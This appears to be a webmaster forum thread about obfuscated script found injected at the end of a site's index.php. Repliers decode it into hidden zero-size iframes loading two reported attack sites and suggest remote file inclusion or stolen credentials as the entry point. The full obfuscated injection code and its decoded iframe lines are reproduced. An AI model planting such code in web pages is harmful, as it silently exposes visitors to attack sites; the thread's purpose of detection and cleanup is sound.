Hi I found this line at the bottom of my site's index.php file Nothing to see here, move along.<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%65%61%6C%61%6E%74%69%73%70%79%77%61%72%65%2E%62%69%7A%2F%31%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%6F%6E%4C%6F%61%64%3D%22%73%74%61%74%75%73%3D%64%65%66%61%75%6C%74%53%74%61%74%75%73%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script><script>eval(String.fromCharCode(28+72,39+72,27+72,45+72,37+72,29+72,38+72,44+72,-26+72,47+72,42+72,33+72,44+72,29+72,-32+72,45+72,38+72,29+72,43+72,27+72,25+72,40+72,29+72,-32+72,-33+72,-35+72,-21+72,-5+72,-35+72,-18+72,-15+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-22+72,-24+72,-35+72,-17+72,-21+72,-35+72,-17+72,-22+72,-35+72,-18+72,-21+72,-35+72,-21+72,-4+72,-35+72,-22+72,-22+72,-35+72,-18+72,-16+72,-35+72,-17+72,-20+72,-35+72,-17+72,-20+72,-35+72,-17+72,-24+72,-35+72,-21+72,-7+72,-35+72,-22+72,-2+72,-35+72,-22+72,-2+72,-35+72,-18+72,-17+72,-35+72,-18+72,-20+72,-35+72,-17+72,-21+72,-35+72,-22+72,-4+72,-35+72,-17+72,-20+72,-35+72,-18+72,-20+72,-35+72,-17+72,-21+72,-35+72,-22+72,-3+72,-35+72,-18+72,-22+72,-35+72,-18+72,-15+72,-35+72,-17+72,-7+72,-35+72,-22+72,-2+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-18+72,-4+72,-35+72,-18+72,-2+72,-35+72,-22+72,-2+72,-35+72,-18+72,-15+72,-35+72,-18+72,-3+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-17+72,-16+72,-35+72,-22+72,-3+72,-35+72,-17+72,-24+72,-35+72,-18+72,-16+72,-35+72,-17+72,-24+72,-35+72,-21+72,-2+72,-35+72,-18+72,-2+72,-35+72,-17+72,-19+72,-35+72,-17+72,-20+72,-35+72,-21+72,-4+72,-35+72,-21+72,-23+72,-35+72,-21+72,-22+72,-35+72,-21+72,-23+72,-35+72,-21+72,-15+72,-35+72,-21+72,-20+72,-35+72,-21+72,-21+72,-35+72,-21+72,-16+72,-35+72,-21+72,-20+72,-35+72,-21+72,-16+72,-35+72,-21+72,-18+72,-35+72,-22+72,-22+72,-35+72,-22+72,-2
4+72,-35+72,-17+72,-17+72,-35+72,-18+72,-15+72,-35+72,-18+72,-20+72,-35+72,-17+72,-20+72,-35+72,-18+72,-16+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-22+72,-24+72,-35+72,-18+72,-16+72,-35+72,-18+72,-19+72,-35+72,-18+72,-15+72,-35+72,-18+72,-17+72,-35+72,-18+72,-16+72,-35+72,-17+72,-20+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-22+72,-24+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-18+72,-22+72,-35+72,-18+72,-2+72,-35+72,-17+72,-22+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-17+72,-22+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-21+72,-3+72,-35+72,-21+72,-5+72,-35+72,-22+72,-2+72,-35+72,-18+72,-15+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-21+72,-3+72,-33+72,-31+72,-31+72,-13+72));</script> Code (markup): I got the help & told that this is malware script which is actually '<iframe src="http://realantispyware.biz/1/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe> Code (markup): I have removed the script now, but wondering how it could be possible for someone to install it AND how to prevent this from happening again in future. Current file attribute is set to 644. Please help. Thanks
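Looks to me like it's an "encrypted" footer (strictly speaking it is only encoded, not encrypted). Are you using WordPress? Are you using a free 'sponsored' theme? Sponsored themes will sometimes use an encoded footer to keep webmasters from changing the paid links at the bottom of the theme. Either way, decode it and look at what it actually loads before trusting it: a sponsored footer normally produces visible links, not a hidden zero-size iframe.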
It outputs as.... Nothing to see here, move along.<script>document.write(unescape('<iframe src="http://realantispyware.biz/1/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>'));</script><script>eval(String.fromCharCode(28+72,39+72,27+72,45+72,37+72,29+72,38+72,44+72,-26+72,47+72,42+72,33+72,44+72,29+72,-32+72,45+72,38+72,29+72,43+72,27+72,25+72,40+72,29+72,-32+72,-33+72,-35+72,-21+72,-5+72,-35+72,-18+72,-15+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-22+72,-24+72,-35+72,-17+72,-21+72,-35+72,-17+72,-22+72,-35+72,-18+72,-21+72,-35+72,-21+72,-4+72,-35+72,-22+72,-22+72,-35+72,-18+72,-16+72,-35+72,-17+72,-20+72,-35+72,-17+72,-20+72,-35+72,-17+72,-24+72,-35+72,-21+72,-7+72,-35+72,-22+72,-2+72,-35+72,-22+72,-2+72,-35+72,-18+72,-17+72,-35+72,-18+72,-20+72,-35+72,-17+72,-21+72,-35+72,-22+72,-4+72,-35+72,-17+72,-20+72,-35+72,-18+72,-20+72,-35+72,-17+72,-21+72,-35+72,-22+72,-3+72,-35+72,-18+72,-22+72,-35+72,-18+72,-15+72,-35+72,-17+72,-7+72,-35+72,-22+72,-2+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-18+72,-4+72,-35+72,-18+72,-2+72,-35+72,-22+72,-2+72,-35+72,-18+72,-15+72,-35+72,-18+72,-3+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-17+72,-16+72,-35+72,-22+72,-3+72,-35+72,-17+72,-24+72,-35+72,-18+72,-16+72,-35+72,-17+72,-24+72,-35+72,-21+72,-2+72,-35+72,-18+72,-2+72,-35+72,-17+72,-19+72,-35+72,-17+72,-20+72,-35+72,-21+72,-4+72,-35+72,-21+72,-23+72,-35+72,-21+72,-22+72,-35+72,-21+72,-23+72,-35+72,-21+72,-15+72,-35+72,-21+72,-20+72,-35+72,-21+72,-21+72,-35+72,-21+72,-16+72,-35+72,-21+72,-20+72,-35+72,-21+72,-16+72,-35+72,-21+72,-18+72,-35+72,-22+72,-22+72,-35+72,-22+72,-24+72,-35+72,-17+72,-17+72,-35+72,-18+72,-15+72,-35+72,-18+72,-20+72,-35+72,-17+72,-20+72,-35+72,-18+72,-16+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-22+72,-24+72,-35+72,-18+72,-16+72,-35+72,-18+72,-19+72,-35+72,-18+72,-15+72,-35+72,-18+72,-17+72,-35+72,-18+72,-16+72,-35+72,-17+72,-2
0+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-22+72,-24+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-18+72,-22+72,-35+72,-18+72,-2+72,-35+72,-17+72,-22+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-17+72,-22+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-21+72,-3+72,-35+72,-21+72,-5+72,-35+72,-22+72,-2+72,-35+72,-18+72,-15+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-21+72,-3+72,-33+72,-31+72,-31+72,-13+72));</script> Code (markup): Which is a reported attack site (using Nod32) The eval from the above code outputs as... document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%64%73%2D%74%64%73%2E%62%69%7A%2F%64%65%6D%6F%2F%69%6E%64%65%78%2E%70%68%70%3F%6F%75%74%3D%31%32%31%39%34%33%38%34%38%36%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E')); Code (markup): And that unescapes as... <iframe src="http://gds-tds.biz/demo/index.php?out=1219438486" width=0 height=0 frameborder=0></iframe> Code (markup): Ask yourself why they felt the need to encode it 3 times. And why it's reported as an attack site. I'd avoid using it.
Hi, I did not put this script there. It was added by some hacker. I have removed it, but I want to know how someone was able to insert it and how I can prevent this from happening again. The file's current permission (CHMOD) is 644. Thanks
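Seems to me like it's an RFI (Remote File Inclusion) exploit, but a little more info is needed to say for sure. What script are you using? Which version number? What is the URL? Keep in mind that 644 only stops other accounts on the server from writing to the file; it does not stop a change made through the owner's own login (for example a stolen FTP password) or through a vulnerable script that runs as the owner, so compare the file's modification time against your FTP and web server access logs, change your passwords, and update the script to its latest version.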